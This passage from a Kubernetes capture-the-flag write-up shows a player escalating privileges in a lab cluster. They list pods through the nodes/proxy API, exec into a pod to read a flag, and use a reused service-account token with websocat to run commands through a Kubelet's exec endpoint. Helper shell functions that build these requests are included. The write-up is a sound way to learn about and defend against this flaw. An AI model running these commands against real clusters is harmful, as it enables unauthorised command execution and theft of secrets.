{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[{"metadata":{"name":"etcd-master-1","namespace":"kube-system","uid":"580dcf5f02d5b942edc3a4bebb646be6","labels":{"component":"etcd","tier":"control-plane"},"annotations":{"kubeadm.kubernetes.io/etcd.advertise-client-urls":"https://10.0.175.86:2379","kubernetes.io/config.hash":"580dcf5f02d5b942edc3a4bebb646be6","kubernetes.io/config.seen":"2026-03-25T11:14:21.236517296Z","kubernetes.io/config.source":"file"}},"spec":{"volumes":[{"name":"etcd-certs",[..SNIP..]

Nice, that worked. Let’s list the pods from every node.

root@b2-6454ffccfb-xb9sd:~# kubectl get --raw /api/v1/nodes/master-1/proxy/pods | jq '.items[] | .metadata.namespace + ":" + .metadata.name'

"kube-system:kube-controller-manager-master-1"

"kube-system:etcd-master-1"

"kube-system:kube-proxy-ff89x"

"kube-system:calico-node-m5p9d"

"kube-system:kube-apiserver-master-1"

"kube-system:kube-scheduler-master-1"

"kube-system:coredns-7d764666f9-ksk77"

"kube-system:calico-kube-controllers-565c89d6df-w2lq5"

"kube-system:coredns-7d764666f9-bk6q4"

root@b2-6454ffccfb-xb9sd:~# kubectl get --raw /api/v1/nodes/node-1/proxy/pods | jq '.items[] | .metadata.namespace + ":" + .metadata.name'

"kube-system:kube-proxy-q767m"

"kube-system:calico-node-6p8qw"

"jumphost:jumphost-5f66c55446-r5c4r"

root@b2-6454ffccfb-xb9sd:~# kubectl get --raw /api/v1/nodes/node-2/proxy/pods | jq '.items[] | .metadata.namespace + ":" + .metadata.name'

"kube-system:kube-proxy-l6b6z"

"kube-system:calico-node-px875"

"b2:b2-6454ffccfb-xb9sd"

"f117-19rks1k2:f117-56dcc5bbcf-4fgq4"

"sr71-49fj1d92:sr71-8d5bc67c9-hh665"

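The three per-node commands above follow one pattern, so they can be folded into a loop. This is only a sketch: node_proxy_path and list_pods_everywhere are made-up names, and it assumes kubectl and jq are available in the pod, as they were here.

```shell
# node_proxy_path NODE SUBPATH  (hypothetical helper)
# Prints the API server path that proxies SUBPATH to NODE's Kubelet.
node_proxy_path() {
  printf '/api/v1/nodes/%s/proxy/%s' "$1" "${2#/}"
}

# list_pods_everywhere: prints namespace:name for the pods each Kubelet reports.
# Needs kubectl and jq, plus get on nodes and nodes/proxy.
list_pods_everywhere() {
  kubectl get nodes -o name | cut -d/ -f2 | while read -r node; do
    echo "== ${node}"
    kubectl get --raw "$(node_proxy_path "$node" pods)" </dev/null |
      jq -r '.items[] | .metadata.namespace + ":" + .metadata.name'
  done
}
```

Running list_pods_everywhere from the b2 pod should give the same listing as the commands above, grouped by node.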
The most interesting pods look to be on node-2, in two randomly named namespaces. Let’s see if we have any permissions in them.

root@b2-6454ffccfb-xb9sd:~# kubectl -n f117-19rks1k2 auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

pods/exec [] [] [get list create]

pods [] [] [get list]

nodes/proxy [] [] [get watch list]

nodes [] [] [get watch list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

OK, so we can just exec into that pod to get its flag.

root@b2-6454ffccfb-xb9sd:~# kubectl -n f117-19rks1k2 exec -ti f117-56dcc5bbcf-4fgq4 -- bash

CONNECTIVITY RESTORED.

root@f117-56dcc5bbcf-4fgq4:~# cat /etc/secret/flag

flag_ctf{kubecon_EU_24_ftw}

Two done. One to go.

I don’t seem to have the same permissions in the sr71-49fj1d92 namespace from the b2 pod. The f117-19rks1k2 pod’s service account only seems to have read access to pods as well.

Guess we need to actually use the nodes/proxy attack. There is a fun quirk in Kubernetes where the get verb is all that is required to execute commands. Historically, exec has required the create verb; however, a WebSocket connection is opened with an HTTP GET, so it’s possible with get alone. I won’t go into too much detail here, but you can read more at https://raesene.github.io/blog/2024/11/11/When-Is-Read-Only-Not-Read-Only/ and https://grahamhelton.com/blog/nodes-proxy-rce. One is for pods/exec, the other is for nodes/proxy. Unfortunately, I don’t have a WebSocket tool. This is also a restricted environment without internet… hmm…

I spend ages experimenting with different ways to use kubectl get --raw to see if I can somehow get a WebSocket connection through standard HTTP. The answer is, of course, no. Eventually, I try downloading the websocat binary from the b2 pod, and it works! This was probably allow-listed.

I try a ton more websocat shenanigans through the API server proxy, also to no avail.

Eventually, I wonder if the network filtering differs between pods more than I originally assumed. If b2 can’t access the Kubelet, what about the f117-19rks1k2 pod? Connecting to that pod and checking… IT CAN CONNECT! So much time wasted.

Well, easy enough now. All that is left is getting the websocat binary and the b2 service account token into that pod.

root@f117-56dcc5bbcf-4fgq4:~# /tmp/websocat --insecure --header "Authorization: Bearer $TOKEN" --protocol "v4.channel.k8s.io" "wss://10.0.140.243:10250/exec/sr71-49fj1d92/sr71-8d5bc67c9-hh665/stealth?output=1&error=0&command=cat&command=/etc/secret/flag"

flag_ctf{is_GET_really_read_only}

{"metadata":{},"status":"Success"}

There we go!
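The exec URL is the fiddly part of that command, since each argv element becomes its own command= parameter. Here is a small sketch of how it is assembled. kubelet_exec_url is a hypothetical helper, port 10250 and the output=1&error=0 parameters are copied from the command above, and no URL encoding is done, so arguments with spaces or special characters would need encoding first.

```shell
# kubelet_exec_url HOST NAMESPACE POD CONTAINER CMD [ARG...]  (hypothetical helper)
# Prints the Kubelet exec WebSocket URL, with one command= parameter per
# argv element. Arguments are NOT percent-encoded.
kubelet_exec_url() {
  host=$1 ns=$2 pod=$3 container=$4
  shift 4
  query="output=1&error=0"
  for arg in "$@"; do
    query="${query}&command=${arg}"
  done
  printf 'wss://%s:10250/exec/%s/%s/%s?%s' "$host" "$ns" "$pod" "$container" "$query"
}
```

The result can be passed to websocat in place of the literal URL, for example "$(kubelet_exec_url 10.0.140.243 sr71-49fj1d92 sr71-8d5bc67c9-hh665 stealth cat /etc/secret/flag)", with the same --insecure, --header and --protocol options as before.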

Conclusions

Once again, ControlPlane have made quite a fun CTF. I was slightly annoyed by the differing network policies on the last one; however, that was a bad assumption on my part that I should have validated.

This was also a CTF where I was keen to see the progress of Iain (Smarticu5), as he was attempting it with Opus 4.6 AI. He talks about this at https://blog.iainsmart.co.uk/posts/2026-03-25-claudes-ctf-experience/.



I got second place in this one, congrats to ftornik for coming in first.